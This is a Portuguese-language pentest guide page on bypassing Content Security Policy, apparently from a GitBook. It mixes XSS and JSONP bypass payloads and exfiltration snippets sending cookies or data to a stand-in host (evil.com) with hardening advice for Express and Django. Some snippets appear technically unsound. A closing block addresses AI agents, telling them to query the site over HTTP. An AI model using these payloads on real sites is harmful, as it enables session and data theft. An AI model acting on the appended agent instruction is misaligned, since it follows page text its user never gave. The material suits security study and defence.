# Content Security Policy (CSP) Bypass

## 🔍 Fundamentos do CSP

### O que é Content Security Policy

CSP é um mecanismo de segurança que permite controlar quais recursos podem ser carregados e executados em uma página web.

### Estrutura Básica do CSP

```http
Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.com
```

### Diretivas Principais

```javascript
// Diretivas comuns de CSP
const cspDirectives = {
    scriptSrc: "Controla fontes de scripts",
    styleSrc: "Controla folhas de estilo", 
    imgSrc: "Controla imagens",
    connectSrc: "Controla conexões (XHR, WebSocket)",
    fontSrc: "Controla fontes web",
    objectSrc: "Controla plugins (Flash, Java)",
    mediaSrc: "Controla áudio/vídeo",
    frameSrc: "Controla iframes",
    baseUri: "Restringe URL base",
    formAction: "Restringe destinos de formulários",
    frameAncestors: "Controla embedding (X-Frame-Options)"
};
```

### Fontes Permitidas

```
'self'           - Apenas mesma origem
'none'           - Bloqueia tudo
'unsafe-inline'  - Permite inline scripts/styles
'unsafe-eval'    - Permite eval()
https:           - Qualquer origem HTTPS
data:            - Permite URIs data:
*.example.com    - Domínio curinga
'nonce-{value}'  - Nonce específico
'sha256-{hash}'  - Hash de conteúdo
```

***

## ⚔️ Mecanismos de Bypass

### Fluxo de Análise de Bypass

```mermaid
graph TD
    A[Analisar CSP] --> B{Política Restritiva?}
    B -->|Sim| C[Buscar Relaxamentos]
    B -->|Não| D[Explorar Diretamente]
    
    C --> E[Verificar unsafe-inline]
    C --> F[Analisar Domínios Permitidos]
    C --> G[Verificar JSONP/APIs]
    
    E --> H[Bypass via Inline]
    F --> I[Bypass via Domínios]
    G --> J[Bypass via JSONP]
    
    H --> K[XSS com Inline]
    I --> L[Upload/Redirecionamento]
    J --> M[Exfiltração via Callbacks]
```

### Categoria 1: Bypass de Script-Src

#### 1.1 Injeção em Tags HTML Existentes

```html
<!-- CSP: script-src 'self' 'unsafe-inline' -->
<input value="</script><script>alert(1)</script>">

<!-- Exploração -->
<script>
var userInput = "</script><script>alert(document.domain)</script>";
document.write("<input value='" + userInput + "'>");
</script>
```

#### 1.2 Uso de Event Handlers

```html
<!-- CSP: script-src 'self' -->
<div onclick="alert(1)">Clique aqui</div>

<!-- Via injeção -->
<img src=x onerror="alert(document.cookie)">
<svg onload="alert(1)">
```

#### 1.3 Bypass com AngularJS

```html
<!-- CSP permite 'unsafe-eval' -->
<div ng-app ng-csp>
  {{ constructor.constructor('alert(1)')() }}
</div>

<!-- Ou usando $eval -->
<div ng-app ng-csp>
  <div ng-click="$event.view.alert(1)">Clique</div>
</div>
```

### Categoria 2: Bypass via Outras Diretivas

#### 2.1 Bypass via object-src

```html
<!-- CSP: object-src 'self' data: -->
<object data="data:text/html,<script>alert(1)</script>"></object>

<!-- Via Flash -->
<object data="https://evil.com/xss.swf"></object>
```

#### 2.2 Bypass via frame-src

```html
<!-- CSP permite frames de qualquer origem -->
<iframe src="https://evil.com/xss.html"></iframe>

<!-- Com redirecionamento -->
<iframe src="/redirect?url=javascript:alert(1)"></iframe>
```

#### 2.3 Bypass via CSS Injection

```html
<!-- CSP: style-src 'unsafe-inline' -->
<style>
@import url("javascript:alert(1)");
</style>

<!-- Via atributo style -->
<div style="background:url('javascript:alert(1)')"></div>
```

### Categoria 3: Bypass Avançados

#### 3.1 JSONP Endpoint Bypass

```javascript
// CSP permite domínio com JSONP
// script-src 'self' https://api.example.com

// Exploração
<script src="https://api.example.com/jsonp?callback=alert(1)"></script>

// Exfiltração de dados
<script>
function stealData(data) {
    var img = new Image();
    img.src = "https://evil.com/steal?data=" + btoa(data);
}
</script>
<script src="https://api.example.com/userdata?callback=stealData"></script>
```

#### 3.2 Bypass com Service Workers

```javascript
// Se connect-src é restritivo mas script-src permite 'self'
navigator.serviceWorker.register('/sw.js').then(() => {
    navigator.serviceWorker.ready.then(registration => {
        registration.active.postMessage('fetch:/api/secrets');
    });
});

// No service worker
self.addEventListener('message', event => {
    fetch(event.data).then(response => response.text())
        .then(data => self.registration.active.postMessage(data));
});
```

#### 3.3 Bypass via WebSocket

```javascript
// Se connect-src permite WebSockets
var ws = new WebSocket('wss://evil.com/ws');
ws.onopen = function() {
    ws.send(document.cookie);
};
```

***

## 🔧 Técnicas de Exploração

### Técnica 1: Análise e Mapeamento de CSP

#### 1.1 Extração de Política CSP

```javascript
// Extrair CSP via JavaScript
function analyzeCSP() {
    const meta = document.querySelector('meta[http-equiv="Content-Security-Policy"]');
    const header = document.currentScript.ownerDocument.defaultView.performance
        .getEntries()
        .find(entry => entry.responseHeaders && 
              entry.responseHeaders['content-security-policy']);
    
    return {
        meta: meta ? meta.content : null,
        header: header ? header.responseHeaders['content-security-policy'] : null
    };
}

// Via console
(() => {
    const policies = [];
    performance.getEntries().forEach(entry => {
        if (entry.responseHeaders) {
            const csp = entry.responseHeaders['content-security-policy'] ||
                       entry.responseHeaders['content-security-policy-report-only'];
            if (csp) policies.push(csp);
        }
    });
    return policies;
})();
```

#### 1.2 Parser de Política CSP

```javascript
function parseCSP(policyString) {
    const directives = {};
    policyString.split(';').forEach(directive => {
        const [name, ...sources] = directive.trim().split(/\s+/);
        if (name && sources.length) {
            directives[name] = sources;
        }
    });
    return directives;
}

// Uso
const csp = parseCSP("script-src 'self' https://trusted.com; object-src 'none'");
console.log(csp.scriptSrc); // ['self', 'https://trusted.com']
```

### Técnica 2: Bypass com Nonce Reutilização

#### 2.1 Encontrar Nonces Válidos

```html
<script nonce="abc123">console.log('legitimo')</script>

<!-- Buscar nonces na página -->
<script>
const nonces = [];
document.querySelectorAll('[nonce]').forEach(el => {
    nonces.push(el.nonce);
});
console.log('Nonces encontrados:', nonces);
</script>
```

#### 2.2 Reutilizar Nonce para XSS

```html
<!-- Se nonce é reutilizável -->
<script nonce="abc123">
    alert(document.domain);
</script>

<!-- Ou via injeção dinâmica -->
<div id="injection"></div>
<script>
const nonce = document.querySelector('script[nonce]').nonce;
const script = document.createElement('script');
script.nonce = nonce;
script.textContent = 'alert("XSS")';
document.getElementById('injection').appendChild(script);
</script>
```

### Técnica 3: Bypass via Path Restrictions

#### 3.1 Upload de Arquivos Maliciosos

```javascript
// Se script-src permite uploads no mesmo domínio
// Upload de arquivo JS para /uploads/evil.js

// Then load it
<script src="/uploads/evil.js"></script>

// Ou via import
<script type="module">
import '/uploads/evil.js';
</script>
```

#### 3.2 Bypass com URL Redirection

```html
<!-- Se script-src permite domínio com redirecionamento -->
<script src="https://trusted.com/redirect?url=https://evil.com/xss.js"></script>

<!-- Ou via URL shortening -->
<script src="https://bit.ly/3abc123"></script>
```

### Técnica 4: Bypass com Bibliotecas Legítimas

#### 4.1 jQuery Bypass

```html
<!-- Se jQuery está disponível -->
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script>
$.getScript('https://evil.com/xss.js');
</script>

<!-- Ou usando eval indireto -->
<script>
$('body').append('<script>alert(1)</script>');
</script>
```

#### 4.2 React Bypass

```javascript
// Se React está presente e unsafe-eval é permitido
const userInput = '{"type": "div", "props": {"dangerouslySetInnerHTML": {"__html": "<img src=x onerror=alert(1)>"}}}';
const element = JSON.parse(userInput);
ReactDOM.render(element, document.body);
```

#### 4.3 Vue.js Bypass

```html
<!-- Se Vue está presente -->
<div id="app">
  {{ constructor.constructor('alert(1)')() }}
</div>

<!-- Ou via mounted -->
<div id="app" v-html="payload"></div>
<script>
new Vue({
  el: '#app',
  data: {
    payload: '<img src=x onerror=alert(1)>'
  }
});
</script>
```

***

## 🛠️ Ferramentas e Detecção

### Ferramenta 1: CSP Analyzer Automatizado

```python
#!/usr/bin/env python3
# csp_analyzer.py

import re
import requests
from urllib.parse import urljoin
import json

class CSPAnalyzer:
    def __init__(self, target_url):
        self.target = target_url
        self.vulnerabilities = []
    
    def extract_csp(self, response):
        """Extrair política CSP de headers e meta tags"""
        csp_sources = {}
        
        # Headers
        headers = response.headers
        csp_header = headers.get('Content-Security-Policy') or \
                    headers.get('Content-Security-Policy-Report-Only')
        
        if csp_header:
            csp_sources['header'] = self.parse_csp_policy(csp_header)
        
        # Meta tags
        meta_pattern = r'<meta[^>]*http-equiv=["\']Content-Security-Policy["\'][^>]*>'
        meta_matches = re.findall(meta_pattern, response.text, re.IGNORECASE)
        
        for meta in meta_matches:
            content_match = re.search(r'content=["\']([^"\']+)["\']', meta)
            if content_match:
                csp_sources['meta'] = self.parse_csp_policy(content_match.group(1))
        
        return csp_sources
    
    def parse_csp_policy(self, policy_string):
        """Parser de política CSP"""
        directives = {}
        for directive in policy_string.split(';'):
            directive = directive.strip()
            if not directive:
                continue
            
            parts = directive.split(None, 1)
            if len(parts) == 2:
                name, values = parts
                directives[name] = values.split()
        
        return directives
    
    def analyze_vulnerabilities(self, csp_policy):
        """Analisar vulnerabilidades na política CSP"""
        issues = []
        
        # Verificar unsafe-inline
        script_src = csp_policy.get('script-src', [])
        if "'unsafe-inline'" in script_src:
            issues.append({
                'severity': 'HIGH',
                'type': 'unsafe-inline',
                'description': 'Script-src permite unsafe-inline',
                'exploitation': 'Permite XSS via inline scripts'
            })
        
        # Verificar unsafe-eval
        if "'unsafe-eval'" in script_src:
            issues.append({
                'severity': 'MEDIUM',
                'type': 'unsafe-eval',
                'description': 'Script-src permite unsafe-eval',
                'exploitation': 'Permite eval-based XSS'
            })
        
        # Verificar domínios amplos
        wildcard_sources = [src for src in script_src if src.startswith('*')]
        for wildcard in wildcard_sources:
            issues.append({
                'severity': 'HIGH',
                'type': 'wildcard-domain',
                'description': f'Domínio curinga permitido: {wildcard}',
                'exploitation': 'Permite carregar scripts de múltiplos subdomínios'
            })
        
        # Verificar object-src
        object_src = csp_policy.get('object-src', [])
        if "'none'" not in object_src and not all(s in ['self', 'none'] for s in object_src):
            issues.append({
                'severity': 'MEDIUM',
                'type': 'object-src-permissive',
                'description': 'Object-src permite fontes externas',
                'exploitation': 'Permite XSS via object/embed tags'
            })
        
        return issues
    
    def generate_bypass_payloads(self, csp_policy):
        """Gerar payloads de bypass baseados na política"""
        payloads = []
        script_src = csp_policy.get('script-src', [])
        
        # Bypass para unsafe-inline
        if "'unsafe-inline'" in script_src:
            payloads.append({
                'type': 'inline-script',
                'payload': '<script>alert(document.domain)</script>',
                'description': 'XSS via script inline'
            })
            payloads.append({
                'type': 'event-handler',
                'payload': '<img src=x onerror=alert(1)>',
                'description': 'XSS via event handler'
            })
        
        # Bypass para domínios específicos
        for source in script_src:
            if source.startswith('http'):
                payloads.append({
                    'type': 'external-script',
                    'payload': f'<script src="{source}/xss.js"></script>',
                    'description': f'Tentar carregar script do domínio permitido: {source}'
                })
        
        # Bypass para JSONP
        jsonp_endpoints = ['/jsonp', '/callback', '/cb']
        for endpoint in jsonp_endpoints:
            payloads.append({
                'type': 'jsonp-bypass',
                'payload': f'<script src="/api{endpoint}?callback=alert(1)"></script>',
                'description': 'Tentar explorar endpoints JSONP'
            })
        
        return payloads
    
    def scan(self):
        """Executar scan completo"""
        try:
            response = requests.get(self.target)
            csp_sources = self.extract_csp(response)
            
            results = {
                'target': self.target,
                'csp_found': bool(csp_sources),
                'sources': csp_sources,
                'vulnerabilities': [],
                'bypass_payloads': []
            }
            
            for source_type, policy in csp_sources.items():
                vulns = self.analyze_vulnerabilities(policy)
                results['vulnerabilities'].extend(vulns)
                
                payloads = self.generate_bypass_payloads(policy)
                results['bypass_payloads'].extend(payloads)
            
            return results
            
        except Exception as e:
            return {'error': str(e)}

# Uso
if __name__ == "__main__":
    analyzer = CSPAnalyzer('https://alvo.com')
    results = analyzer.scan()
    print(json.dumps(results, indent=2))
```

### Ferramenta 2: CSP Bypass Tester no Browser

```javascript
// Testador de bypass CSP para console do navegador
class CSPBypassTester {
    constructor() {
        this.results = [];
        this.testPayloads = this.generateTestPayloads();
    }
    
    generateTestPayloads() {
        return [
            {
                name: 'Inline Script',
                payload: '<script>alert("XSS")</script>',
                type: 'direct'
            },
            {
                name: 'Event Handler',
                payload: '<img src=x onerror="alert(1)">',
                type: 'event'
            },
            {
                name: 'JavaScript URI',
                payload: '<a href="javascript:alert(1)">Clique</a>',
                type: 'uri'
            },
            {
                name: 'SVG Load',
                payload: '<svg onload="alert(1)">',
                type: 'svg'
            },
            {
                name: 'Form Action',
                payload: '<form action="javascript:alert(1)"><input type=submit>',
                type: 'form'
            }
        ];
    }
    
    testPayload(payload) {
        return new Promise((resolve) => {
            const testArea = document.createElement('div');
            testArea.style.position = 'absolute';
            testArea.style.left = '-9999px';
            testArea.innerHTML = payload;
            
            document.body.appendChild(testArea);
            
            // Verificar se payload foi executado
            setTimeout(() => {
                document.body.removeChild(testArea);
                resolve(true); // Simplificado - na prática verificar execução
            }, 100);
        });
    }
    
    async runTests() {
        console.log('🚀 Iniciando testes de bypass CSP...');
        
        for (const test of this.testPayloads) {
            try {
                await this.testPayload(test.payload);
                this.results.push({
                    ...test,
                    status: 'executed'
                });
                console.log(`✅ ${test.name}: Possível execução`);
            } catch (error) {
                this.results.push({
                    ...test,
                    status: 'blocked',
                    error: error.message
                });
                console.log(`❌ ${test.name}: Bloqueado`);
            }
        }
        
        return this.results;
    }
}

// Uso no console
const tester = new CSPBypassTester();
tester.runTests().then(results => {
    console.table(results);
});
```

### Ferramentas Externas

```bash
# CSP Auditor (Burp Extension)
# https://portswigger.net/bappstore/ef3baded3e6e4ccbb52d96c269699eb3

# CSP Evaluator (Google)
# https://csp-evaluator.withgoogle.com/

# CSP Scanner (CLI)
npm install -g csp-scanner
csp-scanner https://alvo.com
```

***

## 🛡️ Mitigação e Hardening

### Política CSP Segura por Padrão

```http
Content-Security-Policy: 
  default-src 'none';
  script-src 'self' 'nonce-{RANDOM}' 'strict-dynamic';
  style-src 'self' 'nonce-{RANDOM}';
  img-src 'self' data:;
  connect-src 'self';
  font-src 'self';
  object-src 'none';
  base-uri 'self';
  form-action 'self';
  frame-ancestors 'none';
  upgrade-insecure-requests;
  block-all-mixed-content;
```

### Implementação Segura em Backend

#### Express.js com CSP

```javascript
const express = require('express');
const crypto = require('crypto');
const helmet = require('helmet');

const app = express();

// Gerar nonce por request
app.use((req, res, next) => {
    res.locals.nonce = crypto.randomBytes(16).toString('base64');
    next();
});

// Configuração CSP com Helmet
app.use(helmet({
    contentSecurityPolicy: {
        directives: {
            defaultSrc: ["'none'"],
            scriptSrc: ["'self'", (req, res) => `'nonce-${res.locals.nonce}'`],
            styleSrc: ["'self'", (req, res) => `'nonce-${res.locals.nonce}'`],
            imgSrc: ["'self'", "data:"],
            connectSrc: ["'self'"],
            fontSrc: ["'self'"],
            objectSrc: ["'none'"],
            baseUri: ["'self'"],
            formAction: ["'self'"],
            frameAncestors: ["'none'"],
            upgradeInsecureRequests: [],
        },
    },
    crossOriginEmbedderPolicy: true,
    crossOriginOpenerPolicy: true,
    crossOriginResourcePolicy: { policy: "same-site" }
}));

// Uso do nonce no template
app.get('/', (req, res) => {
    res.send(`
        <html>
            <head>
                <script nonce="${res.locals.nonce}">
                    console.log('Script seguro');
                </script>
            </head>
            <body>
                <h1>Aplicação Segura</h1>
            </body>
        </html>
    `);
});
```

#### Django com CSP

```python
# settings.py
CSP_DEFAULT_SRC = ["'none'"]
CSP_SCRIPT_SRC = ["'self'", "'nonce-{nonce}'"]
CSP_STYLE_SRC = ["'self'", "'nonce-{nonce}'"]
CSP_IMG_SRC = ["'self'", "data:"]
CSP_CONNECT_SRC = ["'self'"]
CSP_FONT_SRC = ["'self'"]
CSP_OBJECT_SRC = ["'none'"]
CSP_BASE_URI = ["'self'"]
CSP_FORM_ACTION = ["'self'"]
CSP_FRAME_ANCESTORS = ["'none'"]

# Middleware para nonce
import base64
import os

class CSPNonceMiddleware:
    def __init__(self, get_response):
        self.get_response = get_response
        
    def __call__(self, request):
        request.nonce = base64.b64encode(os.urandom(16)).decode()
        response = self.get_response(request)
        return response

# Template usage
"""
<script nonce="{{ request.nonce }}">
    // Código seguro
</script>
"""
```

### Hardening Avançado

#### 1. Strict Dynamic

```http
Content-Security-Policy: 
  script-src 'nonce-{RANDOM}' 'strict-dynamic';
  object-src 'none';
  base-uri 'self';
```

#### 2. Trusted Types

```http
Content-Security-Policy: 
  require-trusted-types-for 'script';
  trusted-types default;
```

```javascript
// Implementação Trusted Types
if (window.trustedTypes && trustedTypes.createPolicy) {
    const escapePolicy = trustedTypes.createPolicy('default', {
        createHTML: input => input.replace(/</g, '&lt;').replace(/>/g, '&gt;'),
        createScriptURL: input => new URL(input, document.baseURI).toString()
    });
}
```

#### 3. Reporting e Monitoramento

```http
Content-Security-Policy: 
  default-src 'self';
  report-uri /csp-report;
  report-to csp-endpoint;
```

```javascript
// Endpoint de relatório
app.post('/csp-report', (req, res) => {
    const report = req.body;
    console.log('CSP Violation:', report);
    
    // Alertar equipe de segurança
    securityAlert(report);
    
    res.status(204).send();
});
```

***

## 📊 Casos Reais e Exemplos

### Caso 1: Bypass via Google Analytics

#### Vulnerabilidade

```http
Content-Security-Policy: script-src 'self' https://www.google-analytics.com
```

#### Exploração

```html
<script src="https://www.google-analytics.com/ga.js"></script>
<script>
// Usar funções do GA para XSS
__gaTracker('send', 'event', 'xss', 'execute', 'javascript:alert(1)');
</script>
```

### Caso 2: Bypass via AngularJS + unsafe-eval

#### Vulnerabilidade

```http
Content-Security-Policy: script-src 'self' 'unsafe-eval'
```

#### Exploração

```html
<div ng-app ng-csp>
  {{ constructor.constructor('alert(1)')() }}
</div>

<!-- Ou -->
<div ng-app ng-csp>
  <div ng-click="$event.view.alert(1)">Clique</div>
</div>
```

### Caso 3: Bypass via JSONP Endpoint

#### Vulnerabilidade

```http
Content-Security-Policy: script-src 'self' https://api.example.com
```

#### Exploração

```html
<script src="https://api.example.com/jsonp?callback=alert(1)"></script>

<!-- Exfiltração -->
<script>
function exfiltrate(data) {
    fetch('https://evil.com/steal?data=' + btoa(JSON.stringify(data)));
}
</script>
<script src="https://api.example.com/userdata?callback=exfiltrate"></script>
```

### Caso 4: Bypass via Upload de Arquivo

#### Vulnerabilidade

```http
Content-Security-Policy: script-src 'self'
```

#### Exploração

```javascript
// Upload de arquivo JS para /uploads/xss.js
// Então carregar:
<script src="/uploads/xss.js"></script>

// Ou usando import dinâmico
import('/uploads/xss.js');
```

***

## 🔧 Checklist de Segurança CSP

### Checklist de Implementação

* [ ] **Política Restritiva por Padrão**
  * [ ] `default-src 'none'`
  * [ ] `script-src` com nonce ou hash
  * [ ] `object-src 'none'`
  * [ ] `base-uri 'self'`
* [ ] **Proteções Contra Bypass**
  * [ ] Sem `'unsafe-inline'` em produção
  * [ ] Sem `'unsafe-eval'` em produção
  * [ ] Domínios específicos, não curingas
  * [ ] `'strict-dynamic'` quando possível
* [ ] **Hardening Adicional**
  * [ ] `upgrade-insecure-requests`
  * [ ] `block-all-mixed-content`
  * [ ] `frame-ancestors` restritivo
  * [ ] Reporting habilitado

### Checklist de Auditoria

* [ ] **Análise de Política**
  * [ ] Verificar direitivas relaxadas
  * [ ] Testar bypass conhecidos
  * [ ] Validar nonce/hash implementation
* [ ] **Testes de Exploração**
  * [ ] XSS com várias técnicas
  * [ ] Upload de arquivos maliciosos
  * [ ] Exploração de dependências
* [ ] **Monitoramento**
  * [ ] CSP reports sendo coletados
  * [ ] Alertas para violações
  * [ ] Revisão regular de política

***

## 📈 Tendências e Futuro

### Novos Mecanismos de Segurança

```http
# Trusted Types
Content-Security-Policy: require-trusted-types-for 'script'

# Isolation Policies
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp

# Document Policies
Document-Policy: document-write=?0, sync-script=?0
```

### CSP Nível 3+

```http
# Novas diretivas
script-src-attr 'none'
script-src-elem 'self' 'nonce-{RANDOM}'

# Melhor reporting
report-to csp-endpoint
report-sample 0.1
```

### Integração com Outras Defesas

```javascript
// Combinação com outras medidas
const securityHeaders = {
    csp: "script-src 'self' 'nonce-...'",
    permissionsPolicy: "geolocation=(), camera=()",
    referrerPolicy: "strict-origin-when-cross-origin",
    xContentTypeOptions: "nosniff",
    xFrameOptions: "DENY"
};
```

***

## ⚠️ Considerações Finais

### Lições Aprendidas

1. **CSP não é substituto** para outras medidas de segurança
2. **Políticas relaxadas** são praticamente inúteis
3. **Testing contínuo** é essencial
4. **Monitoramento de reports** detecta tentativas de bypass

### Mitos Comuns

* ❌ "CSP com unsafe-inline é melhor que nada" → **FALSO**
* ❌ "APIs não precisam de CSP" → **FALSO**
* ❌ "CSP resolve todos os problemas XSS" → **FALSO**

### Recomendações Finais

1. **Implemente CSP progressivamente** com report-only primeiro
2. **Use nonce/hash-based** ao invés de whitelists
3. **Monitore violações** para ajustar políticas
4. **Combine com outras defesas** como input validation

**🔐 Lembre-se**: CSP é uma camada de defesa poderosa quando implementada corretamente, mas pode dar falsa sensação de segurança se configurada inadequadamente.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xmorte.gitbook.io/bibliadopentestbr/tecnicas/web/front-end/content-security-policy-csp-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.